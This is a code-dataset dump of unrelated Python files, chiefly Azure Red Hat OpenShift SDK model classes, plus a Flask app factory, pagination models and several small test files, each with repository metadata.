:type message: str
:param target: The target of the particular error. For example, the name
of the property in error.
:type target: str
:param details: A list of additional details about the error.
:type details:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CloudErrorBody]
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[CloudErrorBody]'},
}
def __init__(self, *, code: str=None, message: str=None, target: str=None, details=None, **kwargs) -> None:
super(CloudErrorBody, self).__init__(**kwargs)
self.code = code
self.message = message
self.target = target
self.details = details
class ClusterProfile(Model):
"""ClusterProfile represents a cluster profile.
:param pull_secret: The pull secret for the cluster.
:type pull_secret: str
:param domain: The domain for the cluster.
:type domain: str
:param version: The version of the cluster.
:type version: str
:param resource_group_id: The ID of the cluster resource group.
:type resource_group_id: str
"""
_attribute_map = {
'pull_secret': {'key': 'pullSecret', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'resource_group_id': {'key': 'resourceGroupId', 'type': 'str'},
}
def __init__(self, *, pull_secret: str=None, domain: str=None, version: str=None, resource_group_id: str=None, **kwargs) -> None:
super(ClusterProfile, self).__init__(**kwargs)
self.pull_secret = pull_secret
self.domain = domain
self.version = version
self.resource_group_id = resource_group_id
class ConsoleProfile(Model):
"""ConsoleProfile represents a console profile.
:param url: The URL to access the cluster console.
:type url: str
"""
_attribute_map = {
'url': {'key': 'url', 'type': 'str'},
}
def __init__(self, *, url: str=None, **kwargs) -> None:
super(ConsoleProfile, self).__init__(**kwargs)
self.url = url
class Display(Model):
"""Display represents the display details of an operation.
:param provider: Friendly name of the resource provider.
:type provider: str
:param resource: Resource type on which the operation is performed.
:type resource: str
:param operation: Operation type: read, write, delete, listKeys/action,
etc.
:type operation: str
:param description: Friendly name of the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(self, *, provider: str=None, resource: str=None, operation: str=None, description: str=None, **kwargs) -> None:
super(Display, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class IngressProfile(Model):
"""IngressProfile represents an ingress profile.
:param name: The ingress profile name.
:type name: str
:param visibility: Ingress visibility. Possible values include: 'Private',
'Public'
:type visibility: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param ip: The IP of the ingress.
:type ip: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'visibility': {'key': 'visibility', 'type': 'str'},
'ip': {'key': 'ip', 'type': 'str'},
}
def __init__(self, *, name: str=None, visibility=None, ip: str=None, **kwargs) -> None:
super(IngressProfile, self).__init__(**kwargs)
self.name = name
self.visibility = visibility
self.ip = ip
class MasterProfile(Model):
"""MasterProfile represents a master profile.
:param vm_size: The size of the master VMs. Possible values include:
'Standard_D16as_v4', 'Standard_D16s_v3', 'Standard_D2s_v3',
'Standard_D32as_v4', 'Standard_D32s_v3', 'Standard_D4as_v4',
'Standard_D4s_v3', 'Standard_D8as_v4', 'Standard_D8s_v3',
'Standard_E16s_v3', 'Standard_E32s_v3', 'Standard_E4s_v3',
'Standard_E64i_v3', 'Standard_E64is_v3', 'Standard_E8s_v3',
'Standard_F16s_v2', 'Standard_F32s_v2', 'Standard_F4s_v2',
'Standard_F72s_v2', 'Standard_F8s_v2', 'Standard_G5', 'Standard_GS5',
'Standard_M128ms'
:type vm_size: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.VMSize
:param subnet_id: The Azure resource ID of the master subnet.
:type subnet_id: str
"""
_attribute_map = {
'vm_size': {'key': 'vmSize', 'type': 'str'},
'subnet_id': {'key': 'subnetId', 'type': 'str'},
}
def __init__(self, *, vm_size=None, subnet_id: str=None, **kwargs) -> None:
super(MasterProfile, self).__init__(**kwargs)
self.vm_size = vm_size
self.subnet_id = subnet_id
class NetworkProfile(Model):
"""NetworkProfile represents a network profile.
:param pod_cidr: The CIDR used for OpenShift/Kubernetes Pods.
:type pod_cidr: str
:param service_cidr: The CIDR used for OpenShift/Kubernetes Services.
:type service_cidr: str
"""
_attribute_map = {
'pod_cidr': {'key': 'podCidr', 'type': 'str'},
'service_cidr': {'key': 'serviceCidr', 'type': 'str'},
}
def __init__(self, *, pod_cidr: str=None, service_cidr: str=None, **kwargs) -> None:
super(NetworkProfile, self).__init__(**kwargs)
self.pod_cidr = pod_cidr
self.service_cidr = service_cidr
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top
level resource.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(self, *, location: str, tags=None, **kwargs) -> None:
super(TrackedResource, self).__init__(**kwargs)
self.tags = tags
self.location = location
class OpenShiftCluster(TrackedResource):
"""OpenShiftCluster represents an Azure Red Hat OpenShift cluster.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives
:type location: str
:param provisioning_state: The cluster provisioning state. Possible values
include: 'AdminUpdating', 'Creating', 'Deleting', 'Failed', 'Succeeded',
'Updating'
:type provisioning_state: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param cluster_profile: The cluster profile.
:type cluster_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ClusterProfile
:param console_profile: The console profile.
:type console_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ConsoleProfile
:param service_principal_profile: The cluster service principal profile.
:type service_principal_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ServicePrincipalProfile
:param network_profile: The cluster network profile.
:type network_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.NetworkProfile
:param master_profile: The cluster master profile.
:type master_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.MasterProfile
:param worker_profiles: The cluster worker profiles.
:type worker_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.WorkerProfile]
:param apiserver_profile: The cluster API server profile.
:type apiserver_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.APIServerProfile
:param ingress_profiles: The cluster ingress profiles.
:type ingress_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.IngressProfile]
:ivar system_data: The system meta data relating to this resource.
:vartype system_data:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'cluster_profile': {'key': 'properties.clusterProfile', 'type': 'ClusterProfile'},
'console_profile': {'key': 'properties.consoleProfile', 'type': 'ConsoleProfile'},
'service_principal_profile': {'key': 'properties.servicePrincipalProfile', 'type': 'ServicePrincipalProfile'},
'network_profile': {'key': 'properties.networkProfile', 'type': 'NetworkProfile'},
'master_profile': {'key': 'properties.masterProfile', 'type': 'MasterProfile'},
'worker_profiles': {'key': 'properties.workerProfiles', 'type': '[WorkerProfile]'},
'apiserver_profile': {'key': 'properties.apiserverProfile', 'type': 'APIServerProfile'},
'ingress_profiles': {'key': 'properties.ingressProfiles', 'type': '[IngressProfile]'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(self, *, location: str, tags=None, provisioning_state=None, cluster_profile=None, console_profile=None, service_principal_profile=None, network_profile=None, master_profile=None, worker_profiles=None, apiserver_profile=None, ingress_profiles=None, **kwargs) -> None:
super(OpenShiftCluster, self).__init__(tags=tags, location=location, **kwargs)
self.provisioning_state = provisioning_state
self.cluster_profile = cluster_profile
self.console_profile = console_profile
self.service_principal_profile = service_principal_profile
self.network_profile = network_profile
self.master_profile = master_profile
self.worker_profiles = worker_profiles
self.apiserver_profile = apiserver_profile
self.ingress_profiles = ingress_profiles
self.system_data = None
class OpenShiftClusterAdminKubeconfig(Model):
"""OpenShiftClusterAdminKubeconfig represents an OpenShift cluster's admin
kubeconfig.
:param kubeconfig: The base64-encoded kubeconfig file.
:type kubeconfig: str
"""
_attribute_map = {
'kubeconfig': {'key': 'kubeconfig', 'type': 'str'},
}
def __init__(self, *, kubeconfig: str=None, **kwargs) -> None:
super(OpenShiftClusterAdminKubeconfig, self).__init__(**kwargs)
self.kubeconfig = kubeconfig
class OpenShiftClusterCredentials(Model):
"""OpenShiftClusterCredentials represents an OpenShift cluster's credentials.
:param kubeadmin_username: The username for the kubeadmin user.
:type kubeadmin_username: str
:param kubeadmin_password: The password for the kubeadmin user.
:type kubeadmin_password: str
"""
_attribute_map = {
'kubeadmin_username': {'key': 'kubeadminUsername', 'type': 'str'},
'kubeadmin_password': {'key': 'kubeadminPassword', 'type': 'str'},
}
def __init__(self, *, kubeadmin_username: str=None, kubeadmin_password: str=None, **kwargs) -> None:
super(OpenShiftClusterCredentials, self).__init__(**kwargs)
self.kubeadmin_username = kubeadmin_username
self.kubeadmin_password = kubeadmin_password
class OpenShiftClusterUpdate(Model):
"""OpenShiftCluster represents an Azure Red Hat OpenShift cluster.
Variables are only populated by the server, and will be ignored when
sending a request.
:param tags: The resource tags.
:type tags: dict[str, str]
:param provisioning_state: The cluster provisioning state. Possible values
include: 'AdminUpdating', 'Creating', 'Deleting', 'Failed', 'Succeeded',
'Updating'
:type provisioning_state: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.enum
:param cluster_profile: The cluster profile.
:type cluster_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ClusterProfile
:param console_profile: The console profile.
:type console_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ConsoleProfile
:param service_principal_profile: The cluster service principal profile.
:type service_principal_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.ServicePrincipalProfile
:param network_profile: The cluster network profile.
:type network_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.NetworkProfile
:param master_profile: The cluster master profile.
:type master_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.MasterProfile
:param worker_profiles: The cluster worker profiles.
:type worker_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.WorkerProfile]
:param apiserver_profile: The cluster API server profile.
:type apiserver_profile:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.APIServerProfile
:param ingress_profiles: The cluster ingress profiles.
:type ingress_profiles:
list[~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.IngressProfile]
:ivar system_data: The system meta data relating to this resource.
:vartype system_data:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.SystemData
"""
_validation = {
'system_data': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'cluster_profile': {'key': 'properties.clusterProfile', 'type': 'ClusterProfile'},
'console_profile': {'key': 'properties.consoleProfile', 'type': 'ConsoleProfile'},
'service_principal_profile': {'key': 'properties.servicePrincipalProfile', 'type': 'ServicePrincipalProfile'},
'network_profile': {'key': 'properties.networkProfile', 'type': 'NetworkProfile'},
'master_profile': {'key': 'properties.masterProfile', 'type': 'MasterProfile'},
'worker_profiles': {'key': 'properties.workerProfiles', 'type': '[WorkerProfile]'},
'apiserver_profile': {'key': 'properties.apiserverProfile', 'type': 'APIServerProfile'},
'ingress_profiles': {'key': 'properties.ingressProfiles', 'type': '[IngressProfile]'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(self, *, tags=None, provisioning_state=None, cluster_profile=None, console_profile=None, service_principal_profile=None, network_profile=None, master_profile=None, worker_profiles=None, apiserver_profile=None, ingress_profiles=None, **kwargs) -> None:
super(OpenShiftClusterUpdate, self).__init__(**kwargs)
self.tags = tags
self.provisioning_state = provisioning_state
self.cluster_profile = cluster_profile
self.console_profile = console_profile
self.service_principal_profile = service_principal_profile
self.network_profile = network_profile
self.master_profile = master_profile
self.worker_profiles = worker_profiles
self.apiserver_profile = apiserver_profile
self.ingress_profiles = ingress_profiles
self.system_data = None
class Operation(Model):
"""Operation represents an RP operation.
:param name: Operation name: {provider}/{resource}/{operation}.
:type name: str
:param display: The object that describes the operation.
:type display:
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.Display
:param origin: Sources of requests to this operation. Comma separated
list with valid values user or system, e.g. "user,system".
:type origin: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'Display'},
'origin': {'key': 'origin', 'type': 'str'},
}
def __init__(self, *, name: str=None, display=None, origin: str=None, **kwargs) -> None:
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
self.origin = origin
class ProxyResource(Resource):
"""The resource model definition for an Azure Resource Manager proxy resource.
It will have everything other than required location and tags.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}
:vartype id: str
:ivar name: The name of the resource
:vartype name: str
:ivar type: The type of the resource. E.g.
"Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs) -> None:
super(ProxyResource, self).__init__(**kwargs)
class ServicePrincipalProfile(Model):
"""ServicePrincipalProfile represents a service principal profile.
:param client_id: The client ID used for the cluster.
:type client_id: str
:param client_secret: The client secret used for the cluster.
:type client_secret: str
"""
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'client_secret': {'key': 'clientSecret', 'type': 'str'},
}
def __init__(self, *, client_id: str=None, client_secret: str=None, **kwargs) -> None:
super(ServicePrincipalProfile, self).__init__(**kwargs)
self.client_id = client_id
self.client_secret = client_secret
class SystemData(Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource.
Possible values include: 'User', 'Application', 'ManagedIdentity', 'Key'
:type created_by_type: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the
resource. Possible values include: 'User', 'Application',
'ManagedIdentity', 'Key'
:type last_modified_by_type: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.CreatedByType
:param last_modified_at: The type of identity that last modified the
resource.
:type last_modified_at: datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(self, *, created_by: str=None, created_by_type=None, created_at=None, last_modified_by: str=None, last_modified_by_type=None, last_modified_at=None, **kwargs) -> None:
super(SystemData, self).__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
class WorkerProfile(Model):
"""WorkerProfile represents a worker profile.
:param name: The worker profile name.
:type name: str
:param vm_size: The size of the worker VMs. Possible values include:
'Standard_D16as_v4', 'Standard_D16s_v3', 'Standard_D2s_v3',
'Standard_D32as_v4', 'Standard_D32s_v3', 'Standard_D4as_v4',
'Standard_D4s_v3', 'Standard_D8as_v4', 'Standard_D8s_v3',
'Standard_E16s_v3', 'Standard_E32s_v3', 'Standard_E4s_v3',
'Standard_E64i_v3', 'Standard_E64is_v3', 'Standard_E8s_v3',
'Standard_F16s_v2', 'Standard_F32s_v2', 'Standard_F4s_v2',
'Standard_F72s_v2', 'Standard_F8s_v2', 'Standard_G5', 'Standard_GS5',
'Standard_M128ms'
:type vm_size: str or
~azure.mgmt.redhatopenshift.v2021_01_31_preview.models.VMSize
:param disk_size_gb: The disk size of the worker VMs.
:type disk_size_gb: int
:param subnet_id: The Azure resource ID of the worker subnet.
:type subnet_id: str
:param count: The number of worker VMs.
:type count: int
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'vm_size': {'key': 'vmSize', 'type': 'str'},
'disk_size_gb': {'key': 'diskSizeGB', 'type': 'int'},
'subnet_id': {'key': 'subnetId', 'type': 'str'},
'count': {'key': 'count', 'type': 'int'},
}
def __init__(self, *, name: str=None, vm_size=None, disk_size_gb: int=None, subnet_id: str=None, count: int=None, **kwargs) -> None:
super(WorkerProfile, self).__init__(**kwargs)
self.name = name
self.vm_size = vm_size
self.disk_size_gb = disk_size_gb
self.subnet_id = subnet_id
self.count = count
| 39.633557 | 283 | 0.66827 |
c1b7bd4faff6f6fef82a82bf91cebd837356d2dc | 989 | py | Python | backend/api/__init__.py | EylonKoenig/LS_Technology_interview_assessment | 6911391fb86a6e2fca97af86580b2a0d58550baf | [
"MIT"
] | null | null | null | backend/api/__init__.py | EylonKoenig/LS_Technology_interview_assessment | 6911391fb86a6e2fca97af86580b2a0d58550baf | [
"MIT"
] | null | null | null | backend/api/__init__.py | EylonKoenig/LS_Technology_interview_assessment | 6911391fb86a6e2fca97af86580b2a0d58550baf | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask_cors import CORS
from flask_mongoengine import MongoEngine
from flask_jwt_extended import JWTManager
from datetime import timedelta
# from flask import Response, request
db = MongoEngine()
def create_app():
app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*"}})
app.config['MONGODB_SETTINGS'] = {
'host': os.environ['MONGODB_HOST'],
'username': os.environ['MONGODB_USERNAME'],
'password': os.environ['MONGODB_PASSWORD'],
'db': 'webapp'
}
app.config["JWT_SECRET_KEY"] = os.environ["JWT_SECRET_KEY"]
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
app.config["JWT_REFRESH_TOKEN_EXPIRES"] = timedelta(days=15)
from .routes import auth
app.register_blueprint(auth.auth_bluprint)
from .routes import employees
app.register_blueprint(employees.employees_bluprint)
db.init_app(app)
JWTManager(app)
return app
| 21.977778 | 64 | 0.690597 |
c5031c8dd8c7d4ac4badfcceeb7a31cf6b95383d | 506 | py | Python | tests/TestCaseTest.py | tetrohed/pyst | a7906c356802169051ce15db66d204e78f24d66b | [
"MIT"
] | null | null | null | tests/TestCaseTest.py | tetrohed/pyst | a7906c356802169051ce15db66d204e78f24d66b | [
"MIT"
] | null | null | null | tests/TestCaseTest.py | tetrohed/pyst | a7906c356802169051ce15db66d204e78f24d66b | [
"MIT"
] | null | null | null | if __name__ == '__main__':
import sys
from os import path
sys.path.append(path.join(path.dirname(__file__), '..'))
from Pyst import TestCase, WasRun
class TestCaseTest(TestCase):
def setUp(self):
self.test = WasRun('testMethod')
def testRunning(self):
self.test.run()
assert(self.test.wasRun)
def testSetUp(self):
self.test.run()
assert(self.test.wasSetUp)
TestCaseTest('testSetUp').run()
TestCaseTest('testRunning').run()
| 21.083333 | 60 | 0.632411 |
31db29ccb37473f8381c9a78f8ab253aad35d85b | 1,130 | py | Python | tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2021-05-20T16:52:08.000Z | 2021-05-20T16:52:08.000Z | tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2020-12-30T16:44:56.000Z | 2020-12-30T16:44:56.000Z | tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py | tqtezos/pytezos | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | [
"MIT"
] | 1 | 2022-03-20T19:01:00.000Z | 2022-03-20T19:01:00.000Z | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.json')
def test_storage_encoding_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| 40.357143 | 112 | 0.748673 |
35c8fe7d00c96a573757764ebafe9669144bd599 | 975 | py | Python | fixture/application.py | LenaRad/python_training | 0d3909f6c30553852523c5e9222b31ad63d90fec | [
"Apache-2.0"
] | null | null | null | fixture/application.py | LenaRad/python_training | 0d3909f6c30553852523c5e9222b31ad63d90fec | [
"Apache-2.0"
] | null | null | null | fixture/application.py | LenaRad/python_training | 0d3909f6c30553852523c5e9222b31ad63d90fec | [
"Apache-2.0"
] | null | null | null | from selenium import webdriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper
class Application:
def __init__(self, browser, base_url):
if browser == "firefox":
self.wd = webdriver.Firefox(capabilities={"marionette": False})
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.session = SessionHelper(self)
self.group = GroupHelper(self)
self.contact = ContactHelper(self)
self.base_url = base_url
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def open_home_page(self):
wd = self.wd
wd.get(self.base_url)
def destroy(self):
self.wd.quit() | 26.351351 | 75 | 0.606154 |
409fcf1321996e20e20cc7ac5965eeb813c73c55 | 5,649 | py | Python | packages/models-library/src/models_library/rest_pagination.py | sanderegg/osparc-simcore | 13560a554c52b07e2aba67f77baaf4d5ba9edb90 | [
"MIT"
] | null | null | null | packages/models-library/src/models_library/rest_pagination.py | sanderegg/osparc-simcore | 13560a554c52b07e2aba67f77baaf4d5ba9edb90 | [
"MIT"
] | 55 | 2018-05-15T09:47:00.000Z | 2022-03-31T06:56:50.000Z | packages/models-library/src/models_library/rest_pagination.py | odeimaiz/osparc-simcore | 71c2fc58dcfe067487dcd75cb70298a4d6237e97 | [
"MIT"
] | 1 | 2020-04-22T15:06:58.000Z | 2020-04-22T15:06:58.000Z | from typing import Generic, List, Optional, TypeVar
from pydantic import (
AnyHttpUrl,
BaseModel,
Extra,
Field,
NonNegativeInt,
PositiveInt,
validator,
)
from pydantic.generics import GenericModel
DEFAULT_NUMBER_OF_ITEMS_PER_PAGE = 20
def monkey_patch_pydantic_url_regex() -> None:
# waiting for PR https://github.com/samuelcolvin/pydantic/pull/2512 to be released into
# pydantic main codebase
import pydantic
if pydantic.VERSION > "1.8.2":
raise RuntimeError(
(
"Please check that PR https://github.com/samuelcolvin/pydantic/pull/2512 "
"was merged AND added in this version."
"If already present in this version, remove this monkey_patch"
)
)
import re
from typing import Pattern
from pydantic import networks
def url_regex() -> Pattern[str]:
_url_regex_cache = networks._url_regex_cache # pylint: disable=protected-access
if _url_regex_cache is None:
_url_regex_cache = re.compile(
r"(?:(?P<scheme>[a-z][a-z0-9+\-.]+)://)?" # scheme https://tools.ietf.org/html/rfc3986#appendix-A
r"(?:(?P<user>[^\s:/]*)(?::(?P<password>[^\s/]*))?@)?" # user info
r"(?:"
r"(?P<ipv4>(?:\d{1,3}\.){3}\d{1,3})(?=$|[/:#?])|" # ipv4
r"(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])(?=$|[/:#?])|" # ipv6
r"(?P<domain>[^\s/:?#]+)" # domain, validation occurs later
r")?"
r"(?::(?P<port>\d+))?" # port
r"(?P<path>/[^\s?#]*)?" # path
r"(?:\?(?P<query>[^\s#]+))?" # query
r"(?:#(?P<fragment>\S+))?", # fragment
re.IGNORECASE,
)
return _url_regex_cache
networks.url_regex = url_regex
monkey_patch_pydantic_url_regex()
class PageMetaInfoLimitOffset(BaseModel):
limit: PositiveInt = DEFAULT_NUMBER_OF_ITEMS_PER_PAGE
total: NonNegativeInt
offset: NonNegativeInt = 0
count: NonNegativeInt
@validator("offset")
@classmethod
def check_offset(cls, v, values):
if v > 0 and v >= values["total"]:
raise ValueError(
f"offset {v} cannot be equal or bigger than total {values['total']}, please check"
)
return v
@validator("count")
@classmethod
def check_count(cls, v, values):
if v > values["limit"]:
raise ValueError(
f"count {v} bigger than limit {values['limit']}, please check"
)
if v > values["total"]:
raise ValueError(
f"count {v} bigger than expected total {values['total']}, please check"
)
if "offset" in values and (values["offset"] + v) > values["total"]:
raise ValueError(
f"offset {values['offset']} + count {v} is bigger than allowed total {values['total']}, please check"
)
return v
class Config:
extra = Extra.forbid
schema_extra = {
"examples": [
{"total": 7, "count": 4, "limit": 4, "offset": 0},
]
}
class PageLinks(BaseModel):
self: AnyHttpUrl
first: AnyHttpUrl
prev: Optional[AnyHttpUrl]
next: Optional[AnyHttpUrl]
last: AnyHttpUrl
class Config:
extra = Extra.forbid
ItemT = TypeVar("ItemT")
class Page(GenericModel, Generic[ItemT]):
"""
Paginated response model of ItemTs
"""
meta: PageMetaInfoLimitOffset = Field(alias="_meta")
links: PageLinks = Field(alias="_links")
data: List[ItemT]
@validator("data", pre=True)
@classmethod
def convert_none_to_empty_list(cls, v):
if v is None:
v = []
return v
@validator("data")
@classmethod
def check_data_compatible_with_meta(cls, v, values):
if "meta" not in values:
# if the validation failed in meta this happens
raise ValueError("meta not in values")
if len(v) != values["meta"].count:
raise ValueError(
f"container size [{len(v)}] must be equal to count [{values['meta'].count}]"
)
return v
class Config:
extra = Extra.forbid
schema_extra = {
"examples": [
# first page Page[str]
{
"_meta": {"total": 7, "count": 4, "limit": 4, "offset": 0},
"_links": {
"self": "http://osparc.io/v2/listing?offset=0&limit=4",
"first": "http://osparc.io/v2/listing?offset=0&limit=4",
"prev": None,
"next": "http://osparc.io/v2/listing?offset=1&limit=4",
"last": "http://osparc.io/v2/listing?offset=1&limit=4",
},
"data": ["data 1", "data 2", "data 3", "data 4"],
},
# second and last page
{
"_meta": {"total": 7, "count": 3, "limit": 4, "offset": 1},
"_links": {
"self": "http://osparc.io/v2/listing?offset=1&limit=4",
"first": "http://osparc.io/v2/listing?offset=0&limit=4",
"prev": "http://osparc.io/v2/listing?offset=0&limit=4",
"next": None,
"last": "http://osparc.io/v2/listing?offset=1&limit=4",
},
"data": ["data 5", "data 6", "data 7"],
},
]
}
| 32.096591 | 117 | 0.506992 |
fb8bfc144ef36a0d4f926e6b570a842f1a7a66ca | 2,957 | py | Python | backend/corpora/common/utils/db_utils.py | isabella232/corpora-data-portal | 09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9 | [
"MIT"
] | null | null | null | backend/corpora/common/utils/db_utils.py | isabella232/corpora-data-portal | 09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9 | [
"MIT"
] | 1 | 2021-02-23T22:56:13.000Z | 2021-02-23T22:56:13.000Z | backend/corpora/common/utils/db_utils.py | isabella232/corpora-data-portal | 09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9 | [
"MIT"
] | null | null | null | import functools
import logging
import typing
from contextlib import contextmanager
from sqlalchemy.exc import SQLAlchemyError
from .exceptions import CorporaException
from ..corpora_orm import Base, DBSessionMaker
logger = logging.getLogger(__name__)
class DbUtils:
